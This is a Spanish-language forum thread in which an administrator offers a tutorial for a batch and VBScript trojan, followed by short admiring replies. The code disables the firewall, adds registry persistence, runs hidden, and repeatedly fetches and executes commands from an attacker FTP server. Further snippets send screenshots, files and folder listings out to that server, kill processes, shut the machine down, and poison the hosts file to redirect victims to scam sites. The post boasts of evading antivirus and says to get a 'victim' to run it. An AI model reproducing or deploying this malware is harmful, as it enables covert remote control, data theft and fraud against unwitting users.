WINTXCODERS Terminal
[visitante@wintxcoders-pc ~]:$ Bienvenido a la comunidad
Recuerda que puedes participar en nuestra comunidad registrándote

De todo un poco batch

Iniciado por WIитX, Enero 10, 2015, 04:16:08 PM

« anterior - próximo »

WIитX

Administrador

  • Desconectado
  • Hola, en este post voy a explicar como crear una especie de troyano en batch y algo de vbs con el cual podremos ejecutar archivos de comandos de forma oculta en equipos remotos y en la mayoria de los casos este tipo de troyano no sera detectado por el antivirus.

    Primero necesitamos crear un servidor FTP, por ejemplo en You are not allowed to view links. Register or Login ya que es necesario que se permita alojar archivos .bat, .exe, etc... y por ejemplo este hosting si lo permite.
    una vez creado el servidor FTP (no doi muchos datos del proceso porque es bien facil) vamos a pasar a crear el servidor del troyano, asi que abrimos el bloc de notas y copiamos el siguiente codigo:

    NOTA: el funcionamiento del script sera ir conectando de forma reiterada al servidor FTP y si existe el archivo code.bat y lo descarga y lo ejecuta, si no lo vuelve a intentar.

    Código:

    @echo off
    cd %windir%
    echo @echo off>server.bat
    echo netsh firewall set opmode disable>>server.bat
    echo :code>>server.bat
    echo cls>>server.bat
    echo ping -n 45 127.0.0.1^>nul>>server.bat
    echo echo user^>ftp.txt>>server.bat
    echo echo pass^>^>ftp.txt>>server.bat
    echo echo get code.bat^>^>ftp.txt>>server.bat
    echo echo del code.bat^>^>ftp.txt>>server.bat
    echo echo bye^>^>ftp.txt>>server.bat
    echo echo quit^>^>ftp.txt>>server.bat
    echo ftp -s:ftp.txt 111.222.333.444>>server.bat
    echo call :bytes code.bat>>server.bat
    echo :bytes>>server.bat
    echo if ^["%%~z1"^] GTR ^["1"^] (goto :true^) else (goto :false^)>>server.bat
    echo :true>>server.bat
    echo del /f /q ftp.txt>>server.bat
    echo start code.vbs>>server.bat
    echo goto :code>>server.bat
    echo :false>>server.bat
    echo del /f /q ftp.txt>>server.bat
    echo del /f /q code.bat>>server.bat
    echo goto :code>>server.bat
    echo set objshell = createobject ("wscript.shell")>code.vbs
    echo objshell.run "code.bat", vbhide>>code.vbs
    echo set objshell = createobject ("wscript.shell")>server.vbs
    echo objshell.run "server.bat", vbhide>>server.vbs
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v ftp /d %windir%\server.vbs
    start server.vbs
    del /f /q %0



    en el debemos reemplazar:

    user, pass y 111.222.333.444 por el nombre de usuario, clave y dirección IP del servidor FTP, y lo guardamos con extension .bat

    Ahora solo queda conseguir que la "victima" ejecute este archivo .bat que es el servidor, una vez infectada para realizar acciones en el equipo remoto solo debemos subir a la raiz del servidor FTP un archivo de comandos nombrado code.bat, cuando el archivo ya no este en el servidor FTP quedra decir que ya ha sido descargado al equipo de la victima y se ha ejecutado, y por tanto podremos poner otro si queremos.

    A continuacion pongo algunos codes en batch que simulan algunas de las acciones mas comunes de un troyano:

    Apagar equipo:

    Código:

    @echo off
    shutdown -s -t 00
    del /f /q %0



    Cerrar proceso:

    Código:

    @echo off
    taskkill /f /im proceso.exe
    del /f /q %0



    Subir archivo:

    Código:

    @echo off
    echo user>ftp1.txt
    echo pass>>ftp1.txt
    echo get archivodelftp>>ftp1.txt
    echo bye>>ftp1.txt
    echo quit>>ftp1.txt
    ftp -s:ftp1.txt 111.111.111.111
    del /f /q ftp1.txt
    start archivodelftp
    del /f /q %0



    Descargar archivo:

    Código:

    @echo off
    echo user>ftp1.txt
    echo pass>>ftp1.txt
    echo put "ruta archivo">>ftp1.txt
    echo bye>>ftp1.txt
    echo quit>>ftp1.txt
    ftp -s:ftp1.txt 111.111.111.111
    del /f /q ftp1.txt
    del /f /q %0



    Capturar pantalla: (necesita que anteriormente le hayais instalado nircmd)

    Código:

    @echo off
    nircmd.exe savescreenshot imagen.jpg
    echo user>ftp1.txt
    echo pass>>ftp1.txt
    echo put imagen.jpg>>ftp1.txt
    echo bye>>ftp1.txt
    echo quit>>ftp1.txt
    ftp -s:ftp1.txt 111.111.111.111
    del /f /q ftp1.txt
    del /f /q imagen.jpg
    del /f /q %0



    Ver carpetas importantes del equipo:

    Código:

    @echo off
    cd %windir%
    echo. >lista.txt
    cd %programfiles%
    dir /a>>%windir%\lista.txt
    cd %userprofile%\Mis documentos
    dir /a /s>>%windir%\lista.txt
    cd %userprofile%\Escritorio
    dir /a /s>>%windir%\lista.txt
    cd %windir%
    echo user>ftp1.txt
    echo pass>>ftp1.txt
    echo put lista.txt>>ftp1.txt
    echo bye>>ftp1.txt
    echo quit>>ftp1.txt
    ftp -s:ftp1.txt 111.111.111.111
    del /f /q ftp1.txt
    del /f /q %0



    Infectar con scam (al archivo hosts)

    Código:

    @echo off
    echo 111.111.111.111 http://weboriginal.com >>%windir%\system32\drivers\etc\hosts
    echo 111.111.111.111 www.weboriginal.com >>%windir%\system32\drivers\etc\hosts
    echo 111.111.111.111 weboriginal.com >>%windir%\system32\drivers\etc\hosts
    del /f /q %0



    Dejar hosts limpios (quitar scams)

    Código:

    @echo off
    cd %windir%\system32\drivers\etc
    del /f /q hosts
    echo user>ftp1.txt
    echo pass>>ftp1.txt
    echo get hosts>>ftp1.txt
    echo bye>>ftp1.txt
    echo quit>>ftp1.txt
    ftp -s:ftp1.txt 111.111.111.111
    del /f /q ftp1.txt
    del /f /q %0



    Espero que sea util, salu2

    cualquier duda o sugerencia postearla.
    Entrar a la web You are not allowed to view links. Register or Login
    "Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
    Dudas / Sugerencias: You are not allowed to view links. Register or Login

    PAYASAKX

    Maestro

  • Desconectado
  • Muy interesante este tutorial, es de las pocas veces que veo un Troyano programado en Batch, me parece super interesante esto del Batch, ya que puedes hacer muchas cosas con él.

    WIитX

    Administrador

  • Desconectado
  • Debería de ser más correcto llamarle un script en vez de troyano pero bueno ^^
    Entrar a la web You are not allowed to view links. Register or Login
    "Es más divertido hacerse pirata que unirse a la marina." (Steve Jobs)
    Dudas / Sugerencias: You are not allowed to view links. Register or Login

    PAYASAKX

    Maestro

  • Desconectado
  • You are not allowed to view links. Register or Login
    Debería de ser más correcto llamarle un script en vez de troyano pero bueno ^^
    mm Sí, yo tambien lo llamaria script, pero el post es tuyo jeje, corrige si quieres .

    PD; Tengo que probarlo eh.